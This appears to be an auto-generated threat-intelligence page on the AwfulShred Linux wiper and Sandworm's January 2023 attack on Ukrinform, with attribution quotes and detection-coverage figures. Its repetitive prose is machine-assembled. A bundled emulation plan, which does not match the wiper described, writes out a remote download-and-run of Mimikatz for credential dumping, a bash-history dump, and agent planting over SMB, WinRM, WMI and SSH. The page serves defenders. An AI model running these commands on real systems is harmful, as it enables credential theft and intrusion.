Home/Threat Actor/AwfulShred
Threat Actor

AwfulShred

awfulshred · russia · active since 2023-01

AwfulShred (canonical CERT-UA + industry naming per advisory 5850 January 27, 2023) is a Sandworm UAC- 0082 Linux Bash wiper deployed January 17, 2023 against Ukrainian state news agency Ukrinform as the Linux-targeting component of 5-wiper malware cocktail (CaddyWiper + ZeroWipe + SDelete on Windows + AwfulShred on Linux + BidSwipe on FreeBSD)

Russia GRU Unit 74455 Sandworm Team high-confidence attribution via CERT-UA canonical advisory 5850 with UAC-0082 = Sandworm tracking identity per Malwarebytes ("CERT-UA says it is confident the attack was carried out by the UAC-0082 group, which is its name for the Sandworm group") + Bleeping Computer ("CERT-UA linked the attack to the Sandworm threat group last week, a hacking outfit part of the Russian Military Unit 74455 of the Main Intelligence Directorate GRU") + ESET January 27 2023 SwiftSlicer parallel disclosure + Help Net Security + TechSpot + Dark Reading + SOC Prime industry coverage.

standalone cluster paralleling nikowiper + doublezero + roarbat in v0.1.151 Russia-aligned 2022-2023 destructive wiper operations cell.

operational target profile Ukrainian state news agency Ukrinform primary target January 17, 2023 + Linux systems specifically targeted by AwfulShred component within broader Windows + Linux + FreeBSD orchestrated 5-wiper malware cocktail + information communication system disruption objective + cluster-defining cyber-kinetic coordination with Yurii Shchyhol SSSCIP head press briefing delay about Russia hybrid warfare tactics ("The January cyberattack resulted in a delay of a press briefing by Yurii Shchyhol, head of the State Service of Special Communications and Information Protection, who intended to discuss Russia's use of hybrid warfare tactics")

operational attack architecture: (1) cluster-defining December 7, 2022 initial access + month-long dormancy APT tradecraft per Bleeping Computer + The Hacker News + Help Net Security ("the threat actors gained remote access to Ukrinform's network around December 7th and waited more than a month to unleash the malware cocktail"), signature Sandworm operational pattern.

(2) cluster-defining 5-wiper malware cocktail multi-platform strategy per CERT-UA + Bleeping Computer + TechSpot ("Sandworm has been busy since the Ukraine conflict... malware scripts targeted Windows, Linux, and FreeBSD systems and infected them with multiple malware payloads, including CaddyWiper, ZeroWipe, SDelete, AwfulShred, and BidSwipe") demonstrating Sandworm operational sophistication in orchestrated multi-platform destructive package tradecraft.

(3) signature Group Policy GPO deployment for CaddyWiper component within cocktail consistent with Sandworm pattern across v0.1.130 CaddyWiper April 2022 + v0.1.136 SwiftSlicer January 2023 + v0.1.151 RoarBAT April- May 2023.

(4) signature partial-success outcome with limited storage systems impact only per SSSCIP ("The wipers only managed to destroy files on 'several data storage systems,' which didn't impact Ukrinform's operations. The CERT-UA emphasizes that the cyberattack was only a partial success, specifically with regard to a limited number of data storage systems"), operationally significant defensive partial-mitigation despite sophisticated cocktail strategy.

(5) cluster- defining cyber-kinetic coordination press-briefing- disruption signature with destructive attack timed to delay Ukrainian official statement about Russia hybrid warfare campaign, characteristic of broader Russia-aligned cyber-information warfare coordination pattern.

cluster fills the January- 2023-onward + Linux-Bash-wiper + 5-wiper-malware- cocktail-component + Sandworm-UAC-0082-high- confidence-attribution + Ukrinform-state-news- agency-targeting + December-2022-initial-access + month-long-dormancy-APT-tradecraft + Ukrinform- partial-success-outcome + Yurii-Shchyhol-press- briefing-disruption position in Russia-aligned 2022-2023 destructive wiper operations cell; canonical illustration of 5-wiper malware cocktail multi-platform Sandworm strategy + Linux Bash wiper component capability + UAC-0082 = Sandworm tracking identity + dormant-access-then-deploy APT tradecraft + Ukrinform partial-success-outcome + Yurii Shchyhol SSSCIP press briefing cyber-kinetic coordination cited in essentially all subsequent destructive cyberweapon industry analyses through 2023-2026 period.

russia confidence: high 11 aliases
Sigma rules200 YARA rules0 Live IOCs0 CVEs exploited0

Profile

AwfulShred (canonical CERT-UA + industry naming per January 27, 2023 advisory 5850) is a Sandworm UAC- 0082 Linux Bash wiper deployed January 17, 2023 against Ukrainian state news agency Ukrinform as Linux-targeting component of 5-wiper malware cocktail (CaddyWiper + ZeroWipe + SDelete on Windows + AwfulShred on Linux + BidSwipe on FreeBSD). Russia GRU Unit 74455 Sandworm Team high-confidence attribution via CERT-UA canonical advisory 5850 with UAC-0082 = Sandworm tracking identity per Malwarebytes confirmation. CERT-UA dormant access (December 7, 2022) + month-long wait before execution (January 17, 2023) signature APT tradecraft.

Standalone cluster paralleling nikowiper + doublezero + roarbat in v0.1.151 Russia-aligned 2022-2023 destructive wiper operations cell.

Operational target profile
  • Ukrainian state news agency Ukrinform primary target January 17, 2023.
  • Linux systems specifically targeted by AwfulShred component.
  • Information communication system disruption objective.
  • Cyber-kinetic coordination: Yurii Shchyhol SSSCIP press briefing delay about Russia hybrid warfare tactics Operational attack architecture: (1) December 7, 2022 initial access + month-long dormancy (cluster-defining): APT dwell tradecraft typical of Sandworm (2) 5-wiper malware cocktail multi-platform strategy (cluster-defining): CaddyWiper + ZeroWipe + SDelete (Windows) + AwfulShred (Linux) + BidSwipe (FreeBSD) orchestrated package (3) Group Policy GPO deployment for CaddyWiper component (signature): consistent with Sandworm pattern (v0.1.130 CaddyWiper April 2022 + v0.1.136 SwiftSlicer January 2023 + v0.1.151 RoarBAT April- May 2023) (4) Partial-success outcome (signature): per SSSCIP, limited storage systems impact only (5) Cyber-kinetic coordination press-briefing- disruption (signature): delayed Yurii Shchyhol SSSCIP press briefing about Russia hybrid warfare The cluster fills the January-2023-onward + Linux- Bash-wiper + 5-wiper-malware-cocktail-component + Sandworm-UAC-0082-high-confidence-attribution + Ukrinform-targeting + month-long-dormancy-tradecraft position in Russia-aligned 2022-2023 destructive wiper operations cell.

Aliases

11
awfulshredawful shredawful_shredawfulshred_wiperawfulshred linux bash wiperawfulshred sandworm uac-0082 ukrinform january 2023awfulshred cert-ua advisory 5850 ukrinform attack cocktailawfulshred caddywiper zerowipe sdelete bidswipe 5-wiper malware cocktailawfulshred ukrinform partial success limited storage impactawfulshred linux freebsd multi-platform destructive operationsawfulshred december 7 2022 initial access dormant month-wait

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

8
2023-2026Continued Industry Reference Status (2023-2026)
2023AwfulShred Origin, Ukrinform Attack 5-Wiper Cocktail (January 17, 2023)
2023AwfulShred 5-Wiper Malware Cocktail Multi-Platform Strategy Signature
2023AwfulShred Ukrinform Partial-Success Outcome (Limited Storage Systems Impact)
2023AwfulShred Cyber-Kinetic Coordination, Yurii Shchyhol Press Briefing Delay Signature
2023CERT-UA Advisory 5850 Canonical Disclosure (January 27, 2023)
2023AwfulShred ESET SwiftSlicer Parallel Disclosure (January 25-27, 2023)
2022-2023AwfulShred December 7 2022 Initial Access + Month-Long Dormancy Signature

Attribution & Reporting

Attributed by
CERT-UA (canonical advisory 5850 January 27, 2023 + UAC-0082 high-confidence Sandworm attribution + 5-wiper malware cocktail identification)ESET (canonical January 27, 2023 SwiftSlicer disclosure + ESET Research analysis context)Bleeping Computer (canonical Ukraine Sandworm hackers hit news agency with 5 data wipers coverage)The Hacker News (canonical NikoWiper coverage with Ukrinform 5-wiper cocktail context)TechSpot (canonical researchers identify new data-wiping malware analysis)Dark Reading (canonical Russia Sandworm APT Swarm Wiper Attacks coverage)Help Net Security (canonical A glut of wiper malware hits Ukrainian targets coverage)Malwarebytes (canonical New data wipers deployed against Ukraine coverage)SOC Prime (canonical UAC-0082 Sandworm APT Group Ukrinform analysis)SSSCIP State Service of Special Communications and Information Protection of Ukraine (canonical official statement on Ukrinform partial-success outcome)CyberArmyofRussia_Reborn Telegram channel (canonical January 17, 2023 attack publication reference)
Key reporting
reportCERT-UA: canonical advisory 5850 January 27, 2023, AwfulShred + 5-wiper malware cocktail + UAC-0082 high-confidence Sandworm attribution
reportBleeping Computer: Ukraine Sandworm hackers hit news agency with 5 data wipers (January 27, 2023), canonical industry coverage
reportTechSpot: Researchers identify new data-wiping malware in cyberattack against Ukraine (January 29, 2023)
reportDark Reading: Russia's Sandworm APT Launches Swarm of Wiper Attacks in Ukraine (January 30, 2023)
reportHelp Net Security: A glut of wiper malware hits Ukrainian targets (January 30, 2023)
reportMalwarebytes: New data wipers deployed against Ukraine (January 27, 2023)
reportSOC Prime: UAC-0082 Sandworm APT Group Targets Ukrainian National Information Agency Ukrinform (January 31, 2023)
reportESET: canonical SwiftSlicer parallel disclosure (January 25-27, 2023)
reportSSSCIP State Service of Special Communications and Information Protection of Ukraine: canonical official statement on Ukrinform partial-success outcome
reportCybersecurity-help.cz: Russia-linked Sandworm continuing to target Ukraine with destructive attacks (May 2023)

Operational

State sponsor

Russia GRU Unit 74455, Sandworm Team via CERT-UA UAC-0082 canonical high-confidence attribution. Industry tracking per ESET + Bleeping Computer + The Hacker News + Dark Reading + Help Net Security + TechSpot + Malwarebytes. CERT-UA advisory 5850 January 27, 2023.

Attribution chain: (1) CERT-UA canonical advisory 5850 January 27 2023 + UAC-0082 high-confidence Sandworm attribution: per CERT-UA: "As of January 27, 2023, 5 samples of malicious programs (scripts) were detected, the functionality of which is aimed at violating the integrity and availability of information (writing files/disks with zero bytes/arbitrary data and their subsequent deletion)." Per Bleeping Computer: "CERT-UA linked the attack to the Sandworm threat group last week, a hacking outfit part of the Russian Military Unit 74455 of the Main Intelligence Directorate (GRU)." (2) CERT-UA UAC-0082 = Sandworm canonical tracking identity: per Malwarebytes: "Based on the results of the investigation, CERT-UA says it is confident the attack was carried out by the UAC-0082 group, which is its name for the Sandworm group." Per SOC Prime: "The russia-linked Sandworm APT group (aka UAC-0082) has been continuously targeting Ukrainian public systems and critical infrastructure for at least a decade." (3) ESET January 27 2023 SwiftSlicer disclosure + Ukrinform-AwfulShred-confirmed-Sandworm: per ESET: "Attackers deployed a new wiper we named SwiftSlicer using Active Directory Group Policy. The SwiftSlicer wiper is written in Go." Per Help Net Security: "the Ukranian CERT has confirmed that the attackers who recently aimed to disrupting the operation of the National News Agency of Ukraine (Ukrinform) used various wiper malware and one legitimate Windows command line utility to try to 'destroy' machines running different operating systems. They believe the Sandworm team was behind it, as well." (4) Bleeping Computer + TechSpot + Dark Reading canonical 5-wiper malware cocktail identification: per Bleeping Computer: "The list of destructive malware deployed in the attack against Ukrinform includes CaddyWiper (Windows), ZeroWipe (Windows), SDelete (Windows), AwfulShred (Linux), and BidSwipe (FreeBSD).

Two of the five strains, ZeroWipe and BidSwipe, are either new malware or are tracked by the Ukrainians under different names than those used by anti-malware vendors." (5) CERT-UA dormancy + group policy deployment tradecraft signature: per Bleeping Computer + The Hacker News + Help Net Security: "the threat actors gained remote access to Ukrinform's network around December 7th and waited more than a month to unleash the malware cocktail." Per TechSpot: "The similarities in deployment methods lead ESET to believe that the Sandworm actors may have taken control of their target's Active Directory environments prior to initiating the attack." Group Policy GPO deployment for CaddyWiper consistent with Sandworm pattern per CERT-UA. Operational mission objective: Multi-platform destructive operations against Ukrainian state news agency Ukrinform via 5-wiper malware cocktail (Windows + Linux + FreeBSD) coordinated as integrated destructive package. Operationally linked to delaying Ukrainian press briefing about Russia hybrid warfare tactics.

Operational target profile
  • Ukrainian state news agency Ukrinform primary target January 17, 2023 per CERT-UA.
  • Linux systems specifically targeted by AwfulShred component of 5-wiper cocktail.
  • Information communication system of national news agency.
  • Cyber-kinetic coordination: delayed press briefing by SSSCIP head Yurii Shchyhol about Russia hybrid warfare tactics The cluster fills the January-2023-onward + Linux- Bash-wiper + 5-wiper-malware-cocktail-component + Sandworm-UAC-0082-high-confidence-attribution + Ukrinform-targeting + month-long-dormancy-tradecraft position in Russia-aligned 2022-2023 destructive wiper operations cell.
Motivations
russian_state_destructive_cyberweapon_operations, ukrainian_state_news_agency_information_system_destruction, sandworm_uac_0082_high_confidence_signature_capability, linux_bash_destructive_script_component_capability, 5_wiper_malware_cocktail_multi_platform_signature_capability, month_long_dormancy_apt_tradecraft_signature, cyber_kinetic_coordination_press_briefing_disruption_signature
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)58/60 · 96%
Analytics (MITRE CAR)34/60 · 56%
Runtime / container (Falco)10/60 · 16%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)17/60 · 28%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
SANDWORM UAC-0082 CERT-UA HIGH-CONFIDENCE ATTRIBUTIONSSSCIP YURII SHCHYHOL PRESS BRIEFING DELAY CYBER-KINETIC COORDINATION SIGNATURE
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin